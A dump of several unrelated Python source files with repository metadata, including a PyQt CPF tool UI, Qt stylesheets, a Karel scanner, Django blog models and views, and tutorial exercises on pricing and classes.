        self.btnValidaCpf.setMinimumSize(QtCore.QSize(120, 0))
        font = QtGui.QFont()
        font.setFamily("MS Reference Sans Serif")
        font.setPointSize(12)
        font.setBold(False)
        font.setWeight(50)
        self.btnValidaCpf.setFont(font)
        self.btnValidaCpf.setObjectName("btnValidaCpf")
        self.gridLayout.addWidget(self.btnValidaCpf, 0, 2, 1, 1)
        # Row 1: "Gerar CPF" label and generate button.
        self.label = QtWidgets.QLabel(self.centralwidget)
        font = QtGui.QFont()
        font.setFamily("MS Reference Sans Serif")
        font.setPointSize(12)
        font.setBold(False)
        font.setWeight(50)
        self.label.setFont(font)
        self.label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
        self.label.setObjectName("label")
        self.gridLayout.addWidget(self.label, 1, 1, 1, 1)
        self.BtnGeraCpf = QtWidgets.QPushButton(self.centralwidget)
        font = QtGui.QFont()
        font.setFamily("MS Reference Sans Serif")
        font.setPointSize(12)
        font.setBold(False)
        font.setWeight(50)
        self.BtnGeraCpf.setFont(font)
        self.BtnGeraCpf.setObjectName("BtnGeraCpf")
        self.gridLayout.addWidget(self.BtnGeraCpf, 1, 2, 1, 1)
        # Row 2: result label spanning all three columns.
        self.labelRetorno = QtWidgets.QLabel(self.centralwidget)
        font = QtGui.QFont()
        font.setFamily("MS Reference Sans Serif")
        font.setPointSize(26)
        font.setBold(False)
        font.setItalic(False)
        font.setWeight(50)
        self.labelRetorno.setFont(font)
        self.labelRetorno.setStyleSheet("color: green;\n"
"font: 26pt \"MS Reference Sans Serif\";")
        self.labelRetorno.setInputMethodHints(QtCore.Qt.ImhNone)
        self.labelRetorno.setText("")
        self.labelRetorno.setAlignment(QtCore.Qt.AlignCenter)
        self.labelRetorno.setObjectName("labelRetorno")
        self.gridLayout.addWidget(self.labelRetorno, 2, 0, 1, 3)
        mainWindow.setCentralWidget(self.centralwidget)
        self.retranslateUi(mainWindow)
        QtCore.QMetaObject.connectSlotsByName(mainWindow)

    def retranslateUi(self, mainWindow):
        """Set all user-visible strings (hooked into Qt's translation system)."""
        _translate = QtCore.QCoreApplication.translate
        mainWindow.setWindowTitle(_translate("mainWindow", "Gera ou Valida CPF"))
        self.label_2.setText(_translate("mainWindow", "Validar CPF"))
        self.btnValidaCpf.setText(_translate("mainWindow", "Validar"))
        self.label.setText(_translate("mainWindow", "Gerar CPF"))
        self.BtnGeraCpf.setText(_translate("mainWindow", "Gerar"))
| [
"luisfelipemenardi@gmail.com"
] | luisfelipemenardi@gmail.com |
e25792216f15f7cbbb8cbb007b836e573f7926a2 | ed8a6d4c4f7e2852bd9d2bd29da2030b0de6b78d | /InnovApplication/styleSheet.py | 535d62806b5a014b453c742b4a0a639b43c7fa58 | [] | no_license | CrippledCoder/Innovation-Control-Station | 9e36cda44740e8f36e6ecebac81cc4e1f43c818f | 02f5702ec8829b71d40879186fa407af6077b755 | refs/heads/master | 2020-10-01T09:41:12.353605 | 2020-01-20T06:42:31 | 2020-01-20T06:42:31 | 227,510,841 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,757 | py | buttonStyle = '''QPushButton {
box-shadow: 3px 4px 0px 0px #1564ad;
background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:0, y2:1, stop:0.05 #79bbff, stop:1 #378de5);
border-radius:10px;
border:1px solid #337bc4;
display:inline-block;
cursor:pointer;
color:#ffffff;
font-family:Arial;
font-size:40px;
font-weight:bold;
padding:12px 44px;
text-decoration:none;
text-shadow:0px 1px 0px #528ecc;
height: 80px;
}
QPushButton:hover {
background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:0, y2:1, stop:0.05 #378de5, stop:1 #79bbff);
background-color:#378de5;
}
QPushButton:active {
position:relative;
top:1px;
}
'''
adminButtonStyle = '''QPushButton {
box-shadow: 3px 4px 0px 0px #1564ad;
background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:0, y2:1, stop:0.05 #79bbff, stop:1 #378de5);
border-radius:10px;
border:1px solid #337bc4;
display:inline-block;
cursor:pointer;
color:#ffffff;
font-family:Arial;
font-size:30px;
font-weight:bold;
text-decoration:none;
text-shadow:0px 1px 0px #528ecc;
height: 80px;
word-wrap: normal;
width: 100px;
}
QPushButton:hover {
background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:0, y2:1, stop:0.05 #378de5, stop:1 #79bbff);
background-color:#378de5;
}
QPushButton:active {
position:relative;
top:1px;
}
'''
passButtonStyle = '''QPushButton {
box-shadow: 3px 4px 0px 0px #1564ad;
background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:0, y2:1, stop:0.05 #84ed6f, stop:1 #70cc5e);
border-radius:10px;
border:1px solid #337bc4;
display:inline-block;
cursor:pointer;
color:#ffffff;
font-family:Arial;
font-size:20px;
font-weight:bold;
text-decoration:none;
text-shadow:0px 1px 0px #528ecc;
height: 40px;
word-wrap: normal;
width: 100px;
color: black;
}
QPushButton:hover {
background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:0, y2:1, stop:0.05 #58a14a, stop:1 #84ed6f);
background-color:#70cc5e;
}
QPushButton:active {
position:relative;
top:1px;
}
'''
# Cancel/reject button: red-orange gradient, same compact geometry as pass.
cancelButtonStyle = '''QPushButton {
	box-shadow: 3px 4px 0px 0px #1564ad;
	background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:0, y2:1, stop:0.05 #e88066, stop:1 #bd6a55);
	border-radius:10px;
	border:1px solid #337bc4;
	display:inline-block;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:20px;
	font-weight:bold;
	text-decoration:none;
	text-shadow:0px 1px 0px #528ecc;
	height: 40px;
	word-wrap: normal;
	width: 100px;
	color: black;
}
QPushButton:hover {
	background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:0, y2:1, stop:0.05 #995645, stop:1 #e88066);
	background-color:#bd6a55;
}
QPushButton:active {
	position:relative;
	top:1px;
}
'''
"emontano07@gmail.com"
] | emontano07@gmail.com |
d7a325770fdcbe57186119e3f58637592af06199 | 2821a44dbb4ced3ed3c09bc34f2506a98460bdb7 | /myapp/api/controllers.py | 4f86a6f76da2e2938bc4f3d265c0a7d33d41cc21 | [] | no_license | frylion007/flask-template | 81159f742049031dc6a021f3d686ebc76bc5dd97 | a26e5f5a13c3f433b7cf359ea628b5f050c427f5 | refs/heads/master | 2020-04-16T02:59:14.265247 | 2018-03-20T09:34:38 | 2018-03-20T09:34:38 | 165,215,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | from flask import Blueprint
from views import TestApiView
api_bp = Blueprint("api", __name__, url_prefix="/api")
api_bp.add_url_rule("/<user_name>/", view_func=TestApiView, methods=["GET", "POST"])
| [
"nib@yoozoo.com"
] | nib@yoozoo.com |
b8d323d0decccbe9ef3af3f5071207f3446049e5 | bc1e9812575b2e75e63c518c707774d82a033ad7 | /compiler/scanner.py | 082c4728496231d10df020c9f0e89109cc356751 | [
"MIT"
] | permissive | julien-klaus/karel_the_robot | 98fff949acea48db90a5a748adc9daa0030dacfc | a9faa528330152e0a7862e9f2b6727abfb6d3c31 | refs/heads/master | 2022-11-09T12:11:22.513985 | 2020-06-16T09:15:55 | 2020-06-16T09:15:55 | 270,610,152 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,773 | py | import string
# Token tables for the Karel-language scanner below.
# SYMBOLS maps each single-character token to its token class.
SYMBOLS = {
    "m": "command", # move, no effect at barrier
    "l": "command", # turn left 90 degree
    "i": "command", # if <condition> (<program>) (<program>)
    "u": "command", # until <condition> (<program>)
    "b": "condition", # TRUE if next is barrier
    "n": "condition", # TRUE current heading is north
    "s": "condition", # TRUE current heading is south
    "e": "condition", # TRUE current heading is east
    "w": "condition", # TRUE current heading is west
    "(": "lpar",
    ")": "rpar",
    ".": "dot",
    "#": "hash",
    "=": "equal"
}
# Digit characters "0".."9" and uppercase ASCII letters, used by next().
NUMBER = list([str(i) for i in range(0, 10)])
ALPHA = list(string.ascii_uppercase)
class Scanner():
    """Character-level scanner producing (token-class, value) pairs.

    Token classes come from the module-level SYMBOLS/NUMBER/ALPHA tables;
    spaces are skipped, end of input yields (None, None).
    """

    def __init__(self, input_string):
        self.input_string = list(input_string)
        self.index = 0
        self.length = len(self.input_string)
        # TODO: add row and column tracker

    def _get_next_character(self):
        # Consume and return one character; None once the input is exhausted.
        if self.index >= self.length:
            return None
        ch = self.input_string[self.index]
        self.index += 1
        return ch

    def has_next_character(self):
        return self.index < self.length

    def next(self):
        """Return the next (description, value) token pair."""
        ch = self._get_next_character()
        # Spaces are insignificant; skip them.
        while ch == " ":
            ch = self._get_next_character()
        if ch in NUMBER:
            return ("number", ch)
        if ch in ALPHA:
            return ("alpha", ch)
        if ch in SYMBOLS:
            return (SYMBOLS[ch], ch)
        if ch == "\n":
            return ("newline", ch)
        if ch is None:
            return (None, None)
        raise Exception(f"Character {ch} not known.")
"julien.klaus@uni-jena.de"
] | julien.klaus@uni-jena.de |
4cf33718ef8b8bd7a8a0b1a563669018b615f109 | 9d4f68edfe2b68689f27fbf8d4601b5e759c9b07 | /restful_dailyfresh/apps/user/migrations/0001_initial.py | fb8fea353230fb69877bbb8bf707e5f21693a8c5 | [] | no_license | javerthu/demo | 8cb9a7eadadde70c3117b2d598f47d4b977450d7 | 06335132e75c4df4ee2be535e255d9bc762e0087 | refs/heads/master | 2020-08-15T01:23:38.717143 | 2020-04-02T15:36:19 | 2020-04-02T15:36:19 | 215,259,562 | 2 | 0 | null | 2019-10-15T15:31:25 | 2019-10-15T09:29:38 | Python | UTF-8 | Python | false | false | 4,536 | py | # Generated by Django 2.2.6 on 2020-02-08 06:25
from django.conf import settings
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Auto-generated initial migration (Django 2.2) for the user app.

    Creates the df_user table (custom User with extra audit fields) and
    the df_address table.  Do not hand-edit; generate a new migration for
    any schema change.
    """

    initial = True

    dependencies = [
        ('auth', '0011_update_proxy_permissions'),
    ]

    operations = [
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('password', models.CharField(max_length=128, verbose_name='password')),
                ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
                ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
                ('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
                ('first_name', models.CharField(blank=True, max_length=30, verbose_name='first name')),
                ('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
                ('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')),
                ('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
                ('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
                ('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
                ('create_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
                ('update_time', models.DateTimeField(auto_now=True, verbose_name='更新时间')),
                ('is_delete', models.BooleanField(default=False, verbose_name='删除标记')),
                ('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
                ('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
            ],
            options={
                'verbose_name': '用户',
                'verbose_name_plural': '用户',
                'db_table': 'df_user',
            },
            managers=[
                ('objects', django.contrib.auth.models.UserManager()),
            ],
        ),
        migrations.CreateModel(
            name='Address',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('create_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
                ('update_time', models.DateTimeField(auto_now=True, verbose_name='更新时间')),
                ('is_delete', models.BooleanField(default=False, verbose_name='删除标记')),
                ('receiver', models.CharField(max_length=20, verbose_name='收件人')),
                ('addr', models.CharField(max_length=256, verbose_name='收件地址')),
                ('zip_code', models.CharField(max_length=6, null=True, verbose_name='邮政编码')),
                ('phone', models.CharField(max_length=11, verbose_name='联系电话')),
                ('is_default', models.BooleanField(default=False, verbose_name='是否默认')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='所属用户')),
            ],
            options={
                'verbose_name': '地址',
                'verbose_name_plural': '地址',
                'db_table': 'df_address',
            },
        ),
    ]
| [
"867216905@qq.com"
] | 867216905@qq.com |
a04bcc8f85cb55607cb8959f387f42c8434a5ffa | 1cb9c9ad628bd2d890abc82a4a9849fc390d9d8a | /python tutorial/buyLotsOfFruit.py | d4a50cf6e3e163e4b6fa10b73a6469a2233ebb15 | [] | no_license | Krantipaudyal/AI | 48463dac95e6081ce6e527bbd2d3ac168a5f045f | d3eb4e2ab2046f757fc1b83d1e4d6c5ba7dcead5 | refs/heads/main | 2023-04-26T18:53:17.927678 | 2021-05-24T17:48:49 | 2021-05-24T17:48:49 | 370,430,291 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,672 | py | # buyLotsOfFruit.py
# -----------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
"""
To run this script, type
python buyLotsOfFruit.py
Once you have correctly implemented the buyLotsOfFruit function,
the script should produce the output:
Cost of [('apples', 2.0), ('pears', 3.0), ('limes', 4.0)] is 12.25
"""
from __future__ import print_function
# Price per pound for each fruit the store carries.
fruitPrices = {'apples': 2.00, 'oranges': 1.50, 'pears': 1.75,
               'limes': 0.75, 'strawberries': 1.00}


def buyLotsOfFruit(orderList):
    """
    orderList: List of (fruit, numPounds) tuples

    Returns cost of order as a float, or None if any ordered fruit is
    not in fruitPrices (an error naming the fruit is printed).
    """
    totalCost = 0.0
    for fruit, quantity in orderList:
        # Single lookup via .get: None signals an unknown fruit.
        price = fruitPrices.get(fruit)
        if price is None:
            # Name the offending fruit so the caller can fix the order.
            print("Error:", fruit, "not available!")
            return None
        totalCost += price * quantity
    return totalCost
# Main Method
if __name__ == '__main__':
    "This code runs when you invoke the script from the command line"
    # Demo order matching the expected output in the module docstring (12.25).
    orderList = [('apples', 2.0), ('pears', 3.0), ('limes', 4.0)]
    print('Cost of', orderList, 'is', buyLotsOfFruit(orderList))
| [
"krantipaudyal@gmail.com"
] | krantipaudyal@gmail.com |
9ab4ed47cb64a9963e3b6bcb5959c964797d8b3e | 71d406a01a0646c14e4a94491e73f148872a97ec | /blogs/views.py | 624e1838f7747473cce1e85b883b45fa154ec34e | [] | no_license | sriganesh/bearblog | db203ba463a8f83eb00eb4c1ff04657a3ff65c30 | a5900441ba94b70aad7d995e736ab424c0e0a619 | refs/heads/master | 2022-08-22T08:58:24.398971 | 2020-05-26T20:20:44 | 2020-05-26T20:20:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,319 | py | from django.contrib.auth import login, authenticate
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import AuthenticationForm
from django.shortcuts import get_object_or_404, redirect, render
from django.views.generic.edit import DeleteView
from django.utils import timezone
from markdown import markdown
import tldextract
from .forms import BlogForm, PostForm
from .models import Blog, Post
from .helpers import *
def home(request):
    """Render a blog's home page, dispatching on the Host header.

    The bare service host shows the static landing page; a subdomain of it
    selects a Blog by subdomain; any other host is looked up as a custom
    domain.  NOTE(review): this host-resolution block is duplicated in
    posts() and post() -- consider extracting a shared helper.
    """
    http_host = request.META['HTTP_HOST']
    if http_host == 'bearblog.dev' or http_host == 'localhost:8000':
        return render(request, 'landing.html')
    elif 'bearblog.dev' in http_host or 'localhost:8000' in http_host:
        extracted = tldextract.extract(http_host)
        blog = get_object_or_404(Blog, subdomain=extracted.subdomain)
        root = get_root(extracted, blog.subdomain)
    else:
        blog = get_object_or_404(Blog, domain=http_host)
        root = http_host
    # Published content only; pages feed the nav, regular posts the body.
    all_posts = Post.objects.filter(blog=blog, publish=True).order_by('-published_date')
    nav = all_posts.filter(is_page=True)
    posts = all_posts.filter(is_page=False)
    content = markdown(blog.content)
    return render(
        request,
        'home.html',
        {
            'blog': blog,
            'content': content,
            'posts': posts,
            'nav': nav,
            'root': root,
            'meta_description': unmark(blog.content)[:160]
        })
def posts(request):
    """Render the post list for the blog resolved from the Host header.

    Bare service hosts have no blog to list, so they are redirected home.
    """
    http_host = request.META['HTTP_HOST']
    if http_host == 'bearblog.dev' or http_host == 'localhost:8000':
        return redirect('/')
    elif 'bearblog.dev' in http_host or 'localhost:8000' in http_host:
        extracted = tldextract.extract(http_host)
        blog = get_object_or_404(Blog, subdomain=extracted.subdomain)
        root = get_root(extracted, blog.subdomain)
    else:
        blog = get_object_or_404(Blog, domain=http_host)
        root = http_host
    all_posts = Post.objects.filter(blog=blog, publish=True).order_by('-published_date')
    # Pages feed the nav; non-page posts are the actual list content.
    nav = all_posts.filter(is_page=True)
    posts = all_posts.filter(is_page=False)
    return render(
        request,
        'posts.html',
        {
            'blog': blog,
            'posts': posts,
            'nav': nav,
            'root': root,
            'meta_description': unmark(blog.content)[:160]
        }
    )
def post(request, slug):
    """Render a single published post, looked up by slug on the host's blog.

    The slug lookup is restricted to this blog's published posts, so a slug
    belonging to another blog 404s rather than leaking content.
    """
    http_host = request.META['HTTP_HOST']
    if http_host == 'bearblog.dev' or http_host == 'localhost:8000':
        return redirect('/')
    elif 'bearblog.dev' in http_host or 'localhost:8000' in http_host:
        extracted = tldextract.extract(http_host)
        blog = get_object_or_404(Blog, subdomain=extracted.subdomain)
        root = get_root(extracted, blog.subdomain)
    else:
        blog = get_object_or_404(Blog, domain=http_host)
        root = http_host
    all_posts = Post.objects.filter(blog=blog, publish=True).order_by('-published_date')
    nav = all_posts.filter(is_page=True)
    post = get_object_or_404(all_posts, slug=slug)
    content = markdown(post.content)
    return render(
        request,
        'post.html',
        {
            'blog': blog,
            'content': content,
            'post': post,
            'nav': nav,
            'root': root,
            'meta_description': unmark(post.content)[:160]
        }
    )
@login_required
def dashboard(request):
    """Create or edit the logged-in user's blog settings.

    Existing blog: saving the form may update the custom domain (Heroku
    DNS routing) and/or the subdomain (DNS record), each of which triggers
    the corresponding DNS helper and a user-facing message.
    No blog yet (Blog.DoesNotExist): the same form creates one.
    """
    extracted = tldextract.extract(request.META['HTTP_HOST'])
    try:
        blog = Blog.objects.get(user=request.user)
        # Keep the dashboard on the blog's canonical subdomain.
        if extracted.subdomain and extracted.subdomain != blog.subdomain:
            return redirect("{}/dashboard".format(get_root(extracted, blog.subdomain)))
        message = ''
        # Remember current values so we only touch DNS when they change.
        old_subdomain = blog.subdomain
        old_domain = blog.domain
        if request.method == "POST":
            form = BlogForm(request.POST, instance=blog)
            if form.is_valid():
                blog_info = form.save(commit=False)
                if blog_info.domain != old_domain:
                    delete_domain(old_domain)
                    if blog_info.domain:
                        add_new_domain(blog_info.domain)
                        message = f'Set the CNAME record for {blog_info.domain} to point at shaped-krill-fusn49u0rpoovwvgh0i6za5w.herokudns.com'
                if blog_info.subdomain != old_subdomain:
                    blog_info.subdomain_id = update_dns_record(blog.subdomain_id, blog_info.subdomain)
                    message = 'It may take ~5 minutes to activate your new subdomain'
                blog_info.save()
        else:
            form = BlogForm(instance=blog)
        return render(request, 'dashboard/dashboard.html', {
            'form': form,
            'blog': blog,
            'root': get_root(extracted, blog.subdomain),
            'message': message
        })
    except Blog.DoesNotExist:
        # First visit: no blog yet — the form creates one plus its DNS record.
        if request.method == "POST":
            form = BlogForm(request.POST)
            if form.is_valid():
                blog = form.save(commit=False)
                blog.user = request.user
                blog.created_date = timezone.now()
                blog.subdomain_id = create_dns_record(blog.subdomain)
                if blog.domain:
                    add_new_domain(blog.domain)
                blog.save()
                return render(request, 'dashboard/dashboard.html', {
                    'form': form,
                    'blog': blog,
                    'root': get_root(extracted, blog.subdomain),
                    'message': 'It may take ~5 minutes to activate your new subdomain'
                })
            # Invalid creation form: re-render with errors.
            return render(request, 'dashboard/dashboard.html', {'form': form})
        else:
            form = BlogForm()
            return render(request, 'dashboard/dashboard.html', {'form': form})
@login_required
def posts_edit(request):
    """List all posts (published or not) of the logged-in user's blog."""
    extracted = tldextract.extract(request.META['HTTP_HOST'])
    blog = get_object_or_404(Blog, user=request.user)
    # Keep the dashboard on the blog's canonical subdomain.
    if extracted.subdomain and extracted.subdomain != blog.subdomain:
        return redirect("{}/dashboard/posts".format(get_root(extracted, blog.subdomain)))
    posts = Post.objects.filter(blog=blog).order_by('-published_date')
    return render(request, 'dashboard/posts.html', {'posts': posts, 'blog': blog})
@login_required
def post_new(request):
    """Create a new post on the logged-in user's blog, then jump to its edit page."""
    extracted = tldextract.extract(request.META['HTTP_HOST'])
    blog = get_object_or_404(Blog, user=request.user)
    if extracted.subdomain and extracted.subdomain != blog.subdomain:
        return redirect("{}/dashboard/posts/new".format(get_root(extracted, blog.subdomain)))
    message = ''
    if request.method == "POST":
        form = PostForm(request.user, request.POST)
        if form.is_valid():
            post = form.save(commit=False)
            # The blog and publish timestamp are set server-side, not by the form.
            post.blog = blog
            post.published_date = timezone.now()
            post.save()
            return redirect(f"/dashboard/posts/{post.id}/")
    else:
        form = PostForm(request.user)
    return render(request, 'dashboard/post_edit.html', {'form': form, 'blog': blog, 'message': message})
@login_required
def post_edit(request, pk):
    """Edit an existing post on the logged-in user's blog.

    Redirects to the blog's canonical subdomain if the request arrived on
    the wrong host.  On POST, saves the form and refreshes published_date.
    """
    extracted = tldextract.extract(request.META['HTTP_HOST'])
    blog = get_object_or_404(Blog, user=request.user)
    if extracted.subdomain and extracted.subdomain != blog.subdomain:
        return redirect("{}/dashboard/posts".format(get_root(extracted, blog.subdomain)))
    # Scope the lookup to this user's blog so one user cannot open/edit
    # another user's post by guessing its primary key (was: pk only).
    post = get_object_or_404(Post, pk=pk, blog=blog)
    message = ''
    if request.method == "POST":
        form = PostForm(request.user, request.POST, instance=post)
        if form.is_valid():
            post = form.save(commit=False)
            post.blog = blog
            post.published_date = timezone.now()
            post.save()
            message = 'Saved'
    else:
        form = PostForm(request.user, instance=post)
    return render(request, 'dashboard/post_edit.html', {
        'form': form,
        'blog': blog,
        'post': post,
        'root': get_root(extracted, blog.subdomain),
        'message': message
    })
class PostDelete(DeleteView):
    """Confirm-and-delete view for posts.

    NOTE(review): there is no ownership check here — any request that knows
    a post's pk can delete it; confirm whether this should be restricted to
    the post's blog owner like the edit views.
    """
    model = Post
    success_url = '/dashboard/posts'
def not_found(request, *args, **kwargs):
    """Catch-all handler rendering the custom 404 page with HTTP status 404."""
    return render(request,'404.html', status=404)
"hfbmartinus@gmail.com"
] | hfbmartinus@gmail.com |
2060dd1eb8b6b28482c5449d396292c1ec40fab1 | b2a9df531ce9f29a481328abc48e363dfd76337d | /ndnrtc_stream/commands/base.py | c98ccf40cd9e4170085dba2d2f506bdde00e3e3c | [] | no_license | peetonn/ndnrtc-stream | 1901998e8f8484decf7f9b2e829b74f47f61dfcf | 3632c5fe91a14f8e0f67b519585beb53787693a8 | refs/heads/master | 2020-03-28T16:26:11.237276 | 2018-10-22T23:52:45 | 2018-10-22T23:52:45 | 148,694,770 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,603 | py | """The base command."""
from utils import *
from json import dumps
import logging, os, signal, sys, time, tempfile
logger = logging.getLogger(__name__)
class Base(object):
    """A base command.

    Subclasses implement run(); this class handles logging setup, a
    temporary runtime directory, SIGINT handling, and best-effort cleanup
    of child processes spawned by subclasses.
    """
    def __init__(self, options, *args, **kwargs):
        global logger
        checkNfdIsRunning()
        self.options = options
        self.args = args
        self.kwargs = kwargs
        # --verbose switches the root logging level to DEBUG.
        if self.options["--verbose"]:
            logging.basicConfig(level = logging.DEBUG)
        else:
            logging.basicConfig(level = logging.INFO)
        # Route this module's logger through a custom-formatted stdout handler
        # only (propagate=False keeps messages from duplicating via the root).
        ch = logging.StreamHandler(sys.stdout)
        ch.setFormatter(CustomFormatter())
        logger.propagate = False
        logger.handlers = [ch]
        logger.debug('cli options: %s'%dumps(self.options, indent=2, sort_keys=True))
        # temp run directory
        self.runDir = tempfile.mkdtemp(prefix='ndnrtc-stream.')
        logger.debug("temporary runtime directory %s"%self.runDir)
        signal.signal(signal.SIGINT, self.signal_handler)

    def run(self):
        """Command entry point; concrete commands must override this."""
        raise NotImplementedError('You must implement the run() method yourself!')

    def signal_handler(self, sig, frame):
        # Ctrl+C: stop all spawned child processes before exiting.
        logger.warn('caught stop signal...')
        self.stopChildren()

    def stopChildren(self):
        """Terminate all child processes (best effort).

        NOTE(review): self.childrenProcs is never set in this class; the
        bare except presumably guards the case where a subclass never
        created it — confirm, and consider narrowing to AttributeError.
        """
        logger.debug("stopping child processes...")
        try:
            for p in self.childrenProcs:
                self.kill(p)
        except:
            pass
        logger.debug("child processes stopped")

    def kill(self, proc):
        # os.kill(proc.pid, signal.SIGTERM)
        # Terminate only if the process is still running (poll() is None).
        if proc.poll() == None:
            proc.terminate()
"gpeetonn@gmail.com"
] | gpeetonn@gmail.com |
3f4a3c4adb1d52cd5be7908542272346281dd5fd | 2209d0974c4e692669159209de62606667853b2e | /lesson/lesson06b.py | b796b5f7655d4db3e2750b342e9165aca1c525b2 | [] | no_license | g8gg/PythonLearning | 022f0e773881aef276ddf61ebe660cceb9476dfd | 2ae28caea50c152515d0f3d1ffcda2fad302dd48 | refs/heads/master | 2021-01-10T11:13:37.944765 | 2016-02-02T15:51:18 | 2016-02-02T15:51:18 | 47,162,981 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,105 | py | # Object & Class
# Lesson 06 b
# Class method & Static method
# Polymorphic
# named tuple 命名元组
from collections import namedtuple
from this import s
import codecs
print('rot-13', "-" * 70)
print(s) # rot13 encoding !
print("-" * 80)
print(codecs.decode(s, "rot-13"))
class A:
    """Demo class that tallies how many instances have ever been created."""

    count = 0  # class-level counter shared by every instance

    def __init__(self):
        A.count += 1

    def exclaim(self):
        """Print a fixed identification message."""
        print("I'm an A!")

    @classmethod
    def kids(cls):
        """Report the class-wide instance count (classmethod: receives cls)."""
        print("A has", cls.count, "little objects.")
easy_a = A()
easy_b = A()
easy_c = A()
easy_d = A()
easy_a.count = 0
easy_b.count = 1
easy_c.count = 2
easy_d.count = 3
print(easy_a.count)
print(easy_b.count)
print(easy_c.count)
print(easy_d.count)
print(A.count)
# Class Method (keep class attribute)
# A.count = cls.count, not the self.count (instance attribute)
easy_a.kids()
easy_b.kids()
easy_c.kids()
easy_d.kids()
A.kids()
# Static Method
class CoyoteWeapon:
    """Demo of @staticmethod: callable on the class itself, no self or cls."""

    @staticmethod
    def commercial():
        # A static method belongs only to the class definition — it receives
        # neither the instance nor the class.
        print('This CoyoteWeapon has been brought to you by Acme')
CoyoteWeapon.commercial()
# Duck Typing
class Quote:
    """A quotation: a speaker together with the words they said."""

    def __init__(self, person, words):
        self.person = person
        self.words = words

    def who(self):
        """Return the speaker's name."""
        return self.person

    def says(self):
        """Return the words, terminated with a period."""
        return self.words + '.'
class QuestionQuote(Quote):
    """A Quote whose says() ends with a question mark instead of a period."""

    def says(self):
        return self.words + '?'
class ExclamationQuote(Quote):
    """A Quote whose says() ends with an exclamation mark instead of a period."""

    def says(self):
        return self.words + '!'
hunter = Quote('G8GG', 'Python is good')
print(hunter.who(), 'says:', hunter.says())
hunted = QuestionQuote('Bugs Bunny', 'What\'s up, dc')
print(hunted.who(), 'says:', hunted.says())
hunted1 = ExclamationQuote('Daffy Duck', 'It\'s rabbit season')
print(hunted1.who(), 'says:', hunted1.says())
print('-' * 80)
# 多态
# 面向对象的三大特性:封装、继承、多态
# 从一定角度来看,封装和继承几乎都是为多态而准备的
# 多态存在的三个必要条件
# 一、要有继承;
# 二、要有重写;
# 三、父类引用指向子类对象
# 实现多态的技术称为:动态绑定(dynamic binding),是指在执行期间判断所引用对象的实际类型,根据其实际的类型调用其相应的方法
# 多态的作用:消除类型之间的耦合关系
def who_says(obj):
    """Print any quote-like object (duck typing: needs who() and says())."""
    print('{} says {}'.format(obj.who(), obj.says()))
who_says(hunter)
who_says(hunted)
who_says(hunted1)
# magic method / special method
class Word:
    """Wraps a text string to contrast __str__ with __repr__."""

    def __init__(self, text):
        self.text = text

    def __str__(self):
        # str()/print(): just the raw text.
        return self.text

    def __repr__(self):
        # repr(): tagged form shown by the interactive interpreter.
        return 'Word→' + self.text
first = Word('Majun')
print(first) # use __str__
""" Run in Python Console
>>> class Word:
def __init__(self, text):
self.text = text
def __str__(self):
return self.text
def __repr__(self):
return 'Word→' + self.text
>>> first = Word('test')
>>> first # use __repr__
Word→test
"""
print("-" * 80)
# Class and Named Tuple
# class
# is-a关系用继承, has-a关系考虑组合(composition)和聚合(aggregation)
class Bill:
    # Component class: a Duck *has a* bill (composition demo).
    def __init__(self, description):
        self.description = description
class Tail:
    # Component class: a Duck *has a* tail (composition demo).
    def __init__(self, length):
        self.length = length
